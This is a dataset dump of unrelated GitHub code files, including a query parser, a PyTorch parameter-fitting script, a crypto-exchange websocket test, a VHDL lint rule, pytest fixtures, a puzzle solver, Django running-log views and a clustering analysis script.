...]\n\t\tself.sums = [] # [(alias, class_name, descriptor_name), ...]\n\t\tself.relations = [] # [(class1, relation, class2), ...]\n\t\tself.where_expr = \"\"\n\t\tself.where_vars = {} # {name: (class, descriptor), ...}\n\t\tself.classes_used = [] # [name, ...]\n\t\t\n\t\tquerystr, quoted = remove_quoted(self.querystr)\n\t\tquerystr, bracketed_selects = remove_bracketed_selects(querystr, self.classes, self.descriptors)\n\t\tquerystr, bracketed_other = remove_bracketed_all(querystr)\n\t\t\n\t\tcollect = []\n\t\tfor keyword in self.KEYWORDS:\n\t\t\tfor m in re.finditer(r\"(?i)\\b%s\\b\" % (keyword), querystr):\n\t\t\t\ti, j = m.start(0), m.end(0)\n\t\t\t\tcollect.append((i, j, keyword))\n\t\tcollect = sorted(collect)\n\t\tcollect2 = []\n\t\tfor idx in range(len(collect)):\n\t\t\ti, j, keyword = collect[idx]\n\t\t\tif idx < len(collect) - 1:\n\t\t\t\tk = collect[idx + 1][0]\n\t\t\telse:\n\t\t\t\tk = len(querystr)\n\t\t\tcollect2.append((keyword, j, k))\n\t\tcollect = collect2\n\t\tcollect2 = None\n\t\t\n\t\twhile collect:\n\t\t\tkeyword, i, j = collect.pop(0)\n\t\t\tsubstr = querystr[i:j].strip().strip(\",\").strip()\n\t\t\t\n\t\t\tif keyword in [\"SELECT\", \"GROUP BY\"]:\n\t\t\t\tfor name in substr.split(\",\"):\n\t\t\t\t\tname = name.strip()\n\t\t\t\t\tif name in bracketed_selects:\n\t\t\t\t\t\titem = bracketed_selects[name]\n\t\t\t\t\telse:\n\t\t\t\t\t\titem = str_to_key(name)\n\t\t\t\t\tif keyword == \"SELECT\":\n\t\t\t\t\t\tself.selects.append(item)\n\t\t\t\t\t\tself.columns.append(item)\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.group_by.append(item)\n\t\t\t\n\t\t\telif keyword in [\"COUNT\", \"SUM\"]:\n\t\t\t\tname = substr.strip(\"()\").strip()\n\t\t\t\tif name in bracketed_selects:\n\t\t\t\t\tclass_name, descriptor_name = bracketed_selects[name]\n\t\t\t\telse:\n\t\t\t\t\tclass_name, descriptor_name = str_to_key(name)\n\t\t\t\tif 
collect and (collect[0][0] == \"AS\"):\n\t\t\t\t\t_, i, j = collect.pop(0)\n\t\t\t\t\talias = querystr[i:j]\n\t\t\t\t\talias = replace_bracketed(alias, bracketed_other)\n\t\t\t\t\talias = alias.strip().strip(\",\").strip()\n\t\t\t\t\tclass_name, descriptor_name, alias = [(item.strip(\"[]\") if item else None) for item in [class_name, descriptor_name, alias]]\n\t\t\t\t\tif keyword == \"COUNT\":\n\t\t\t\t\t\tself.counts.append((alias, class_name, descriptor_name))\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.sums.append((alias, class_name, descriptor_name))\n\t\t\t\t\tself.columns.append((None, alias))\n\t\t\t\n\t\t\telif keyword == \"RELATED\":\n\t\t\t\tfor chain in substr.split(\",\"):\n\t\t\t\t\tchain = str_to_key(chain.strip())\n\t\t\t\t\tif len(chain) == 3:\n\t\t\t\t\t\trelation = []\n\t\t\t\t\t\tfor item in chain:\n\t\t\t\t\t\t\tif item in bracketed_other:\n\t\t\t\t\t\t\t\trelation.append(bracketed_other[item])\n\t\t\t\t\t\t\t\tif isinstance(relation[-1], str):\n\t\t\t\t\t\t\t\t\trelation[-1] = relation[-1].strip(\"[]\")\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\trelation.append(item.strip(\"[]\"))\n\t\t\t\t\t\tself.relations.append(tuple(relation))\n\t\t\t\n\t\t\telif keyword == \"WHERE\":\n\t\t\t\tsubstr = replace_bracketed(substr, bracketed_other)\n\t\t\t\tself.where_expr, self.where_vars = extract_expr_vars(substr, self.classes, self.descriptors, bracketed_selects)\n\t\t\n\t\tfor key in quoted:\n\t\t\tself.where_expr = self.where_expr.replace(key, quoted[key])\n\t\t\n\t\tfor class_name, _ in self.selects + self.group_by:\n\t\t\tif (class_name is not None) and (class_name not in self.classes_used):\n\t\t\t\tself.classes_used.append(class_name)\n\t\tfor _, class_name, _ in self.counts + self.sums:\n\t\t\tif (class_name is not None) and (class_name not in self.classes_used):\n\t\t\t\tself.classes_used.append(class_name)\n\t\tfor class_name1, _, class_name2 in self.relations:\n\t\t\tfor class_name in [class_name1, class_name2]:\n\t\t\t\tif (class_name is not None) and (class_name not in self.classes_used):\n\t\t\t\t\tself.classes_used.append(class_name)\n\t\tfor name in self.where_vars:\n\t\t\tclass_name = self.where_vars[name][0]\n\t\t\tif class_name not in self.classes_used:\n\t\t\t\tself.classes_used.append(class_name)\n\t\t\t\n","repo_name":"demjanp/deposit","sub_path":"src/deposit/query/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":13297,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"32404664325","text":"# -*- coding: utf-8 -*-\nimport torch\n\n\n\n#params to learn\n# dmg_nor\n# dmg_exp\n# dmg_con\n# small_armor\n# small_hit\n# medium_armor\n# medium_hit\n# large_armor\n# large_hit\n\n\nx = torch.tensor(1.0)\ndmg_nor = torch.tensor([10.0], requires_grad=True)\ndmg_exp = torch.tensor([10.0], requires_grad=True)\ndmg_con = torch.tensor([10.0], requires_grad=True)\nsmall_armor = torch.tensor([1.0], requires_grad=True)\nsmall_hit = torch.tensor([200.0], requires_grad=True)\nmedium_armor = torch.tensor([1.0], requires_grad=True)\nmedium_hit = torch.tensor([200.0], requires_grad=True)\nlarge_armor = torch.tensor([1.0], requires_grad=True)\nlarge_hit = torch.tensor([200.0], requires_grad=True)\ny = torch.tensor(0.03) * 100\n\nlearning_rate = 1\nfor t in range(1000):\n # Forward pass: Compute predicted y by passing x to the model\n y1 = ((x*dmg_nor) - small_armor) / small_hit\n y2 = ((x*dmg_nor) - medium_armor) / medium_hit\n y3 = ((x*dmg_nor) - large_armor) / large_hit\n y4 = ((x*dmg_con) - small_armor) / small_hit\n 
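# Each y_i models (damage - armor) * type-effectiveness multiplier / hit points for one damage-type-vs-armor pairing; y5-y9 divide by small_hit even for medium/large armor, which may be a copy-paste slip.\n 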
y5 = ((x*dmg_con) - medium_armor) * 0.5 / medium_hit\n    y6 = ((x*dmg_con) - large_armor) * 0.25 / large_hit\n    y7 = ((x*dmg_exp) - small_armor) * 0.5 / small_hit\n    y8 = ((x*dmg_exp) - medium_armor) * 0.75 / medium_hit\n    y9 = ((x*dmg_exp) - large_armor) / large_hit\n    y_pred = torch.cat((y1,y2,y3,y4,y5,y6,y7,y8,y9)) * 100\n    \n    #print(y_pred)\n    # Compute and print loss\n    loss = (y_pred-y).pow(2).mul(torch.tensor([9.,6.,3.,6.,4.,2.,3.,2.,1.])).sum()\n    print(t, loss.item())\n\n    loss.backward()\n    with torch.no_grad():\n        dmg_nor -= learning_rate * dmg_nor.grad\n        dmg_exp -= learning_rate * dmg_exp.grad\n        dmg_con -= learning_rate * dmg_con.grad\n        small_armor -= learning_rate * small_armor.grad\n        small_hit -= learning_rate * small_hit.grad\n        medium_armor -= learning_rate * medium_armor.grad\n        medium_hit -= learning_rate * medium_hit.grad\n        large_armor -= learning_rate * large_armor.grad\n        large_hit -= learning_rate * large_hit.grad\n        small_armor[0] = max(small_armor[0],0.0)\n        medium_armor[0] = max(medium_armor[0],0.0)\n        large_armor[0] = max(large_armor[0],0.0)\n        small_armor[0] = min(small_armor[0],10.0)\n        medium_armor[0] = min(medium_armor[0],10.0)\n        large_armor[0] = min(large_armor[0],10.0)\n        small_hit[0] = min(small_hit[0],1000.0)\n        medium_hit[0] = min(medium_hit[0],1000.0)\n        large_hit[0] = min(large_hit[0],1000.0)\n\n        # Manually zero the gradients after updating weights\n        dmg_nor.grad.zero_()\n        dmg_exp.grad.zero_()\n        dmg_con.grad.zero_()\n        small_armor.grad.zero_()\n        small_hit.grad.zero_()\n        medium_armor.grad.zero_()\n        medium_hit.grad.zero_()\n        large_armor.grad.zero_()\n        large_hit.grad.zero_()\nprint(dmg_nor.item(), \n      dmg_con.item(),\n      dmg_exp.item(),\n      small_armor.item(),\n      small_hit.item(),\n      medium_armor.item(),\n      medium_hit.item(),\n      large_armor.item(),\n      large_hit.item()\n      )\n","repo_name":"parkjunsoo91/number-communication","sub_path":"dealing.py","file_name":"dealing.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"5320506923","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# Used to access the OKCOIN futures REST API\n\nimport websocket\nimport socket\nimport sys\n\ntry:\n    import thread\nexcept ImportError:\n    import _thread as thread\nimport time\nimport json\n\nclass WsTool(object):\n    \"\"\"docstring for WsTool\"\"\"\n    def __init__(self, arg):\n        super(WsTool, self).__init__()\n        self.arg = arg\n    def on_message(ws, message):\n        print('-----getMsg------')\n        print(message)\n        print(type(message))\n        # msg = str(message)\n        # dtool.onMessage(message)\n\n    def on_error(ws, error):\n        print('-----error------')\n        print(error)\n\n    def on_close(ws):\n        print(\"### closed ###\")\n\n    def on_open(ws):\n        print('is Open')\n        # def run(*args):\n        # # for i in range(3):\n        # # time.sleep(1)\n        # # ws.send(\"Hello %d\" % i)\n        # # time.sleep(1)\n        # # ws.close()\n        # # print(\"thread terminating...\")\n        # # msg = {\"op\": \"subscribe\", \"args\": [\"tradeBin1m:XBTUSD\",\"orderBook10:XBTUSD\"]}\n        # # msg = {\"op\": \"subscribe\", \"args\": [\"tradeBin1m:XBTUSD\",\"orderBookL2:XBTUSD\"]}\n        # msg = {\"op\": \"subscribe\", \"args\": [\"tradeBin1m:XBTUSD\"]}\n        # # msg = {\"op\": \"subscribe\", \"args\": [\"quoteBin1m:XBTUSD\"]}#instrument\n        # # msg = {\"op\": \"subscribe\", \"args\": [\"instrument:XBTUSD\"]}#instrument\n        # # msg = \"help\"\n        # jstr = json.dumps(msg)\n        # ws.send(jstr)\n        # thread.start_new_thread(run, ())\n\ndef test():\n    # import datetime\n\n    # dat = datetime.datetime(2000,1,1,8,0)\n    # print(dat)\n    for i in [12.12300, 12.00, 
200.12000, 200.0]:\n        d = '{:g}'.format(i)\n        print(type(d))\n        print(float(d))\n        print('{:g}'.format(i))\n\n\ndef main():\n    websocket.enableTrace(True)\n    ws = websocket.WebSocketApp(\"wss://real.okex.com:10440/websocket/okexapi\",\n                              on_message = WsTool.on_message,\n                              on_error = WsTool.on_error,\n                              on_close = WsTool.on_close)\n    ws.on_open = WsTool.on_open\n    ws.run_forever()\n\nif __name__ == \"__main__\":\n    test()\n\n    \n","repo_name":"fengmm521/okex_robot_ubuntuserver","sub_path":"market_XBTU18_okex/wstest.py","file_name":"wstest.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
{"seq_id":"22945927553","text":"\nfrom vsg import token\n\nfrom vsg.rules import token_prefix\n\nlTokens = []\nlTokens.append(token.component_instantiation_statement.instantiation_label)\n\n\nclass rule_601(token_prefix):\n    '''\n    This rule checks for valid prefixes on instantiation labels.\n    The default prefix is *inst_*.\n\n    |configuring_prefix_and_suffix_rules_link|\n\n    **Violation**\n\n    .. code-block:: vhdl\n\n        fifo_32x2k : FIFO\n\n    **Fix**\n\n    .. code-block:: vhdl\n\n        inst_fifo_32x2k : FIFO\n    '''\n\n    def __init__(self):\n        token_prefix.__init__(self, 'instantiation', '601', lTokens)\n        self.prefixes = ['inst_']\n        self.solution = 'instantiation label'\n","repo_name":"jeremiah-c-leary/vhdl-style-guide","sub_path":"vsg/rules/instantiation/rule_601.py","file_name":"rule_601.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"61"}
{"seq_id":"1543254652","text":"import pytest\nimport os\n\nweekday1 = ['Monday','Tuesday']\nweekday2 = ['Wednesday','Thursday']\nfilename = 'fixture_test.txt'\n@pytest.fixture()\ndef get_list():\n\n    weekday1.append('Friday')\n    yield weekday1\n\n    print('remove the inserted element')\n    weekday1.pop()\n\n\ndef test_list(get_list):\n    weekday2.extend(weekday1)\n\n    assert weekday2 == ['Wednesday','Thursday','Monday','Tuesday','Friday']\n\n\n# create a file \n@pytest.fixture()\ndef setup():\n\n    s = open(filename ,'w')\n    s.write('testing')\n    s.close()\n    f = open(filename,'r+')\n    yield f\n    f.close()\n    os.remove(filename)\n\n\ndef test_file(setup):\n\n    assert setup.readline() == 'testing'","repo_name":"amog4/pytest-testing-automation","sub_path":"pytest_fixture_close.py","file_name":"pytest_fixture_close.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"13873768049","text":"\ndef rotate(arr):\n    ret = []\n    for i in range(len(arr)):\n        temp = []\n        for j in range(len(arr)-1, -1, -1):\n            temp.append(arr[j][i])\n        ret.append(temp)\n\n    return ret\n\n# def show(arr):\n#     for i in arr:\n#         print(i)\n#     print()\n\n\ndef check(n, m, px, py, key, board):\n    ret = True\n    # add the key onto the board\n    for i in range(m):\n        for j in range(m):\n            board[px + i][py + j] += key[i][j]\n\n    # check\n    # show(board)\n    for i in range(n):\n        for j in range(n):\n            if board[m + i][m + j] != 1:\n                ret = False\n\n    # delete\n    for i in range(m):\n        for j in range(m):\n            board[px + i][py + j] -= key[i][j]\n\n\n    return ret\n\n\n\ndef solution(key, lock):\n\n    m = len(key)\n    n = len(lock)\n\n    # place the lock in the middle of the board\n    board = [[0] * (2*m + n) for _ in range(2*m + n)]\n    for i in range(n):\n        for j in range(n):\n            board[m + i][m + j] = lock[i][j]\n\n    # check while rotating\n    answer = False\n    k = 0\n    while k < 4:\n        for i in range(1, m + n):\n            for j in range(1, m + n):\n                if 
check(n, m, i, j, key, board):\n answer = True\n break\n if answer:\n break\n\n if answer:\n break\n\n k += 1\n if k == 4:\n break\n key = rotate(key)\n\n return answer\n\nprint(solution([[0, 0, 0], [1, 0, 0], [0, 1, 1]], [[1, 1, 1], [1, 1, 0], [1, 0, 1]]))","repo_name":"whiskey21/my-algorithm-book","sub_path":"카카오기출/자물쇠와열쇠.py","file_name":"자물쇠와열쇠.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32098934935","text":"#jai mata di#\nimport sys\nsys.stdin = open('input.in', 'r') \nsys.stdout = open('output.out', 'w') \n\n\n\n\n#start the code from here\nt=int(input())\nfor i in range(t):\n\tn,m=map(int,input().split())\n\tif m==2:\n\t\ttype1=list(map(int,input().split()))\n\t\tprice=list(map(int,input().split()))\n\t\ttypeperprice=[0 for i in range(m)]\n\t\tfor j in range(n):\n\t\t\ttypeperprice[type1[j]-1]+=price[j]\n\t\th=0\n\t\tif typeperprice[0]==0:\n\t\t\tprint(typeperprice[1])\n\t\t\th=1\n\t\telif typeperprice[1]==0:\n\t\t\tprint(typeperprice[0])\n\t\t\th=1\n\t\tif h==0:\n\t\t\tif typeperprice[0] weekly_total:\n weekly_total = wk_total_dist\n if wk_long_run > long_run:\n long_run = wk_long_run\n week_i += 1\n\n if weekly_total > 0:\n week['tot_change']= (((week.get('total_dist') - weekly_total)/weekly_total) *100)\n else:\n week['tot_change'] = 100\n if long_run > 0:\n week['long_change'] = (((week.get('max_dist') - long_run)/long_run) * 100)\n else:\n week['long_change'] = 100\n \n \n context.update({\n 'years': year_data,\n 'weeks': week_data,\n 'shoes': shoe_data,\n 'totals': total_data,\n #'schedules': Plan.objects.filter(end_date__gt=datetime.datetime.now())\n })\n return context\n\nclass ShoeCreateView(CreateView):\n fields = (\"name\",\"active\",\"main_shoe\")\n model = Shoes\n success_url = reverse_lazy(\"run_app:shoe_list\")\n\nclass ShoeListView(ListView):\n model = Shoes\n queryset = Shoes.objects.all().order_by('-id')\n\n def get_context_data(self, **kwargs):\n context = super(ShoeListView, self).get_context_data(**kwargs)\n dist = Run.objects.values('shoes').annotate(total_dist=Sum('dist')).order_by('-shoes__id')\n list = zip(self.object_list, dist)\n num_runs = Run.objects.all().count()\n total_dist = Run.objects.aggregate(Sum('dist'))\n runtime = Run.objects.aggregate(Sum('time'))\n total_time = runtime.get('time__sum')\n total_cals = Run.objects.aggregate(Sum('cals'))\n start_date = Run.objects.earliest('date')\n summary_list = [num_runs, total_dist, total_time, total_cals, start_date]\n\n context.update({\n 'shoes_list': list,\n 'total_dist': total_dist,\n 'num_runs': num_runs,\n 'total_time': total_time,\n 'total_cals': total_cals,\n 'start_date': start_date\n })\n print (context)\n return context\n\n\nclass ShoeUpdateView(UpdateView):\n fields = ('active', 'main_shoe')\n model = Shoes\n success_url = reverse_lazy(\"run_app:shoe_list\")\n\nclass ShoeDeleteView(DeleteView):\n model= Shoes\n success_url = reverse_lazy(\"run_app:shoe_list\")\n\nclass RunCreateView(CreateView):\n model = Run\n form_class = CreateRunForm\n success_url = reverse_lazy(\"run_app:run_list\")\n\n def form_valid(self, form):\n cd = form.cleaned_data\n self.object = form.save()\n date = form.cleaned_data.get('date')\n Schedule.objects.filter(date=date).update(run=Run.objects.get(date=date))\n return HttpResponseRedirect(self.get_success_url())\n\nclass RunListView(ListView):\n model = Run\n queryset = Run.objects.all().order_by('-date')\n paginate_by = 50\n\nclass RunDetailView(DetailView):\n 
pass\n\nclass RunUpdateView(UpdateView):\n #fields = ('date','dist', 'cals', 'time', 'location', 'shoes')\n model = Run\n success_url = reverse_lazy(\"run_app:run_list\")\n form_class=CreateRunForm\n\n\nclass RunDeleteView(DeleteView):\n model= Run\n success_url = reverse_lazy(\"run_app:run_list\")\n\nclass ScheduleView(DetailView):\n model=Plan\n\n def get_context_data(self, **kwargs):\n today = datetime.datetime.now()\n try:\n plan = Plan.objects.get(pk=self.kwargs.get('pk'))\n for day in Schedule.objects.filter(plan=plan, run=None, date__lte=datetime.datetime.today()):\n print ('updating plan', day)\n if Run.objects.filter(date=day.date).exists():\n print (day.date)\n run = Run.objects.get(date=day.date)\n day.run = run\n day.save()\n print ('updated schedule', day)\n except Exception as e:\n print ('no schedule update', e)\n \n\n\n context = super(ScheduleView, self).get_context_data(**kwargs)\n plan = Plan.objects.get(pk=self.kwargs.get('pk'))\n #today = datetime.datetime.now()\n if today < datetime.datetime.combine(plan.start_date, datetime.datetime.min.time()):\n today = datetime.datetime.combine(plan.start_date, datetime.datetime.min.time())\n \n if today <= datetime.datetime.combine(plan.end_date, datetime.datetime.min.time()):\n current_week = Schedule.objects.filter(date=today).values('week').first()\n last_week = Schedule.objects.filter(week=int(current_week.get('week'))-1).values('week').first()\n next_week = Schedule.objects.filter(week=int(current_week.get('week'))+1).values('week').first()\n print (last_week, current_week, next_week)\n\n expected = Schedule.objects.filter(Q(plan__id=plan.id) & Q(date__lte=today) & Q(dist__gt=0)).aggregate((Sum('dist')), (Count('date')))\n actual = Run.objects.filter(Q(date__lte=today) & Q(date__gte=plan.start_date)).aggregate(Sum('dist'), (Count('date')))\n #base_expected = Schedule.objects.filter(Q(plan__id=plan.id) & Q(date__lte=plan.start_date) & Q(dist__gt=0)).aggregate((Sum('dist')), (Count('date')))\n #base_actual = Run.objects.filter(Q(date__lte=plan.start_date) & Q(date__gte=plan.start_date)).aggregate(Sum('dist'), (Count('date')))\n \n race_expected = Schedule.objects.filter(Q(plan__id=plan.id) & Q(date__lte=today) & Q(date__gte=plan.start_date) & Q(dist__gt=0)).aggregate((Sum('dist')), (Count('date')))\n race_actual = Run.objects.filter(Q(date__lte=today) & Q(date__gte=plan.start_date)).aggregate(Sum('dist'), (Count('date')))\n \n\n #base_plan_km = base_expected.get('dist__sum')*1.6\n #base_expected['plan_km']=base_plan_km\n #base_actual['dist_percent']= (base_actual.get('dist__sum')/base_expected.get('plan_km')) * 100\n #base_actual['run_percent']= (base_actual.get('date__count')/base_expected.get('date__count')) * 100\n\n race_plan_km = race_expected.get('dist__sum')*1.6\n race_expected['plan_km']=race_plan_km\n race_actual['dist_percent']= (race_actual.get('dist__sum')/race_expected.get('plan_km')) * 100\n race_actual['run_percent']= (race_actual.get('date__count')/race_expected.get('date__count')) * 100\n\n #plan_km = expected.get('dist__sum')*1.6\n #expected['plan_km']=plan_km\n #actual['dist_percent']= (actual.get('dist__sum')/expected.get('plan_km')) * 100\n #actual['run_percent']= (actual.get('date__count')/expected.get('date__count')) * 100\n print (actual)\n\n\n\n if plan.end_date - datetime.datetime.now().date() > datetime.timedelta(days=7):\n context.update( {\n 'plan': plan,\n 'last_week': Schedule.objects.filter(plan__pk=self.kwargs.get('pk'), week__in=[last_week.get('week')]),\n 'current_week': 
Schedule.objects.filter(plan__pk=self.kwargs.get('pk'), week__in=[current_week.get('week')]),\n 'next_week': Schedule.objects.filter(plan__pk=self.kwargs.get('pk'), week__in=[next_week.get('week')]),\n 'schedule': Schedule.objects.filter(plan__pk=self.kwargs.get('pk')).exclude(week__in=[last_week.get('week'), current_week.get('week'), next_week.get('week')]).order_by('date'),\n 'expected': expected,\n 'actual': actual,\n #'base_expected': base_expected,\n #'base_actual': base_actual,\n 'race_expected': race_expected,\n 'race_actual': race_actual,\n\n })\n else:\n context.update( {\n 'plan': plan,\n 'last_week': None,\n 'current_week': None,\n 'next_week': None,\n 'schedule': Schedule.objects.filter(plan__pk=self.kwargs.get('pk')).order_by('-date'),\n 'expected': expected,\n 'actual': actual,\n #'base_expected': base_expected,\n #'base_actual': base_actual,\n 'race_expected': race_expected,\n 'race_actual': race_actual,\n\n })\n\n #print (context)\n return context\n\nclass getRunKeeperData(APIView):\n\n #def __init__(self):\n # print ('init')\n\n def get(self, num):\n \n try:\n print ('get')\n #try:\n run_data = strava.StravaData()\n run_dict = run_data.get_runs()\n\n print ('-----')\n print (run_dict, len(run_dict))\n #activities = run_dict['activities']\n for data in json.loads(run_dict):\n print ('starting 4 loop', data)\n if data['activity'] == \"Run\":\n date = data['date'].split('T')[0]\n dist = round(data['distance']/1000,2)\n time = timedelta(seconds=data['time'])\n cals = data['calories']\n #shoe = Shoes.objects.get(main_shoe=True)\n #location = 1\n\n print ('shoes', type(Shoes.objects.get(main_shoe=True)))\n\n if Run.objects.filter(date=datetime.datetime.strptime(date, '%Y-%m-%d'), dist = dist).exists():\n pass\n else:\n run = Run()\n\n run.date=datetime.datetime.strptime(date, '%Y-%m-%d')\n run.dist = dist \n run.time = time\n run.cals = cals\n \n run.shoes = Shoes.objects.get(main_shoe=True)\n run.location = 1\n\n run.save()\n\n update_plan_actual(run)\n else:\n print ('not a run: ', data)\n \n return JsonResponse(run_dict, status=200, safe=False)\n\n #return JsonResponse(json.dumps(run_dict), 200)\n\n except Exception as e:\n print ('api error', e)\n return JsonResponse({'error': str(e)}, status=200)\n\ndef update_plan_actual(run):\n #today = datetime.datetime.now()\n try:\n plan = Plan.objects.all().order_by('-pk')[0]\n for day in Schedule.objects.filter(plan=plan, run=None, date__lte=datetime.datetime.today()):\n print ('updating plan', day)\n if Run.objects.filter(date=day.date).exists():\n print (day.date)\n run = Run.objects.get(date=day.date)\n day.run = run\n day.save()\n print ('updated schedule', day)\n except Exception as e:\n print ('no schedule update', e)\n \n return\n\n\nclass GetShoeDataAPI(APIView):\n\n def get(self, num):\n data = {}\n try:\n data['shoes'] = list(Run.objects.filter(shoes__active=True).values('shoes__name').annotate(Sum('dist')))\n data['runs'] = serializers.serialize('json', Run.objects.all().order_by('-date')[:5], use_natural_foreign_keys=True)\n print (data)\n except Exception as e:\n print ('GETSHoeAPIDATAAPI issue', e)\n data = {'error': str(e)}\n\n return JsonResponse(data, status=200, safe=False)\n\n\nclass GetPlanSummaryAPI(APIView):\n\n #def __init__(self):\n # print ('init')\n\n def get(self, num):\n data = {}\n try:\n plan = Plan.objects.all().order_by('-pk')[0]\n #plan = Plan.objects.get(pk=2)\n if datetime.datetime.combine(plan.end_date, datetime.datetime.min.time()) > datetime.datetime.today():\n max_date = datetime.date.today()\n 
else:\n max_date = plan.end_date\n\n print ('max: ', plan, max_date)\n total_dist = Schedule.objects.filter(plan=plan).aggregate(Sum('dist'))\n #print ('raw total dist ', total_dist)\n #epxected_to_date = Schedule.objects.filter(date__gte=plan.start_date, date__lte=max_date).aggregate(Sum('dist')) \n expected_to_date = Schedule.objects.filter(plan=plan, date__gte=plan.start_date, date__lte=max_date).aggregate(d=Coalesce(Sum('dist'), 0)) \n dist_to_date = Run.objects.filter(date__gte=plan.start_date, date__lte=plan.end_date).aggregate(d=Coalesce(Sum('dist'), 0.0))\n expected_runs = Schedule.objects.filter(plan=plan, date__gte=plan.start_date, date__lte=max_date).exclude(dist=0).count()\n total_runs = Run.objects.filter(date__gte=plan.start_date, date__lte=plan.end_date).count()\n \n data['total_dist'] = round(float(total_dist.get('dist__sum')) * 1.6, 2)\n data['dist_to_date'] = round(dist_to_date.get('d'), 2)\n data['expected_to_date'] = round(float(expected_to_date.get('d')) * 1.6, 2)\n #data['dist_percent'] = round((expected_to_date.get('d')*1.6)/dist_to_date.get('d'),2)\n data['dist_percent'] = round(dist_to_date.get('d')/(expected_to_date.get('d')*1.6),2)\n data['runs_percent'] = round(total_runs/expected_runs,2)\n data['expected_runs'] = expected_runs\n data['total_runs'] = total_runs\n\n for s in Schedule.objects.filter(plan=plan, run__isnull=True, date__lte=max_date):\n if Run.objects.filter(date=s.date).exists():\n s.run = Run.objects.get(date=s.date)\n s.save()\n except Exception as e:\n print ('GETPlanSummaryAPI issue', e)\n data = {'error': str(e)}\n print (data)\n return JsonResponse(data, status=200, safe=False)\n\n\nclass GetThisWeekPlanAPI(APIView):\n\n #def __init__(self):\n # print ('init')\n\n def get(self, num):\n data = {}\n try:\n plan = Plan.objects.all().order_by('-pk')[0]\n today = datetime.datetime.today().date()\n mon = today - timedelta(days=today.weekday())\n sun = mon + timedelta(days=6)\n data = serializers.serialize('json', Schedule.objects.filter(date__gte=mon, date__lte=sun, plan=plan))\n\n except Exception as e:\n print ('GETPlanSummaryAPI issue', e)\n data = json.dumps({'error': str(e)})\n\n return JsonResponse(data, status=200, safe=False)\n","repo_name":"jflynn87/games","sub_path":"run_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33633351287","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 25 13:19:24 2021\n\n@author: ronguy\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 22 20:09:58 2021\n\n@author: ronguy\n\"\"\"\nimport matplotlib.cm as cmx\nimport numpy as np\nfrom sklearn.manifold import TSNE\nfrom scipy import integrate as int\nfrom scipy import stats\nimport matplotlib.pyplot as plt\nimport time\nimport shelve\nimport guidata\nimport guidata.dataset.datatypes as dt\nimport guidata.dataset.dataitems as di\nimport swat\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom time import time\nfrom bootstrap_stat import datasets as d\nfrom bootstrap_stat import bootstrap_stat as bp\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn import preprocessing\nfrom sklearn import datasets\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.linear_model import LinearRegression\nimport statsmodels.stats.weightstats as ws\nfrom sklearn.cluster import KMeans\nimport 
guidata\nimport guidata.dataset.datatypes as dt\nimport guidata.dataset.dataitems as di\nfrom tkinter import *\nfrom tkinter.filedialog import asksaveasfilename\nimport umap\nfrom lmfit import minimize, Parameters\nfrom matplotlib import colors\nfrom sklearn.cluster import DBSCAN\nfrom sklearn import metrics\nfrom sklearn.datasets import make_blobs\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef dbscan_plot(data,eps=0.1,min_samples=50):\n X=data\n X = StandardScaler().fit_transform(X)\n db = DBSCAN(eps=eps, min_samples=min_samples).fit(X)\n core_samples_mask = np.zeros_like(db.labels_, dtype=bool)\n core_samples_mask[db.core_sample_indices_] = True\n labels = db.labels_\n\n # Number of clusters in labels, ignoring noise if present.\n n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\n n_noise_ = list(labels).count(-1)\n\n print('Estimated number of clusters: %d' % n_clusters_)\n print('Estimated number of noise points: %d' % n_noise_)\n print(\"Silhouette Coefficient: %0.3f\"\n % metrics.silhouette_score(X, labels))\n\n # Black removed and is used for noise instead.\n plt.figure(figsize=(10, 10))\n unique_labels = set(labels)\n colors = [plt.cm.Spectral(each)\n for each in np.linspace(0, 1, len(unique_labels))]\n for k, col in zip(unique_labels, colors):\n if k == -1:\n # Black used for noise.\n col = [0, 0, 0, 1]\n\n class_member_mask = (labels == k)\n \n xy = X[class_member_mask & core_samples_mask]\n plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=tuple(col),label = k,\n markeredgecolor='k', markersize=14)\n \n xy = X[class_member_mask & ~core_samples_mask]\n plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=tuple(col),\n markeredgecolor='k', markersize=6)\n \n plt.legend(fontsize=15, title_fontsize='40') \n plt.title('Estimated number of clusters: %d' % n_clusters_)\n plt.show()\n return labels\n\n\n\ndef residual(params, x, data):\n alpha = params['alpha']\n beta = params['beta']\n gam = params['gamma']\n \n\n avMarkers=x['H3.3']*alpha+x['H4']*beta+x['H3']*gam\n od=x.subtract(avMarkers,axis=0)\n return np.std(od['H3.3'])+np.std(od['H4'])+np.std(od['H3'])\n #(pow(od['H3']-avMarkers,2)+pow(od['H3.3']-avMarkers,2)+pow(od['H4']-avMarkers,2))\n\n\n\n\n\n\n\ndef twoSampZ(X1, X2):\n from numpy import sqrt, abs, round\n from scipy.stats import norm\n 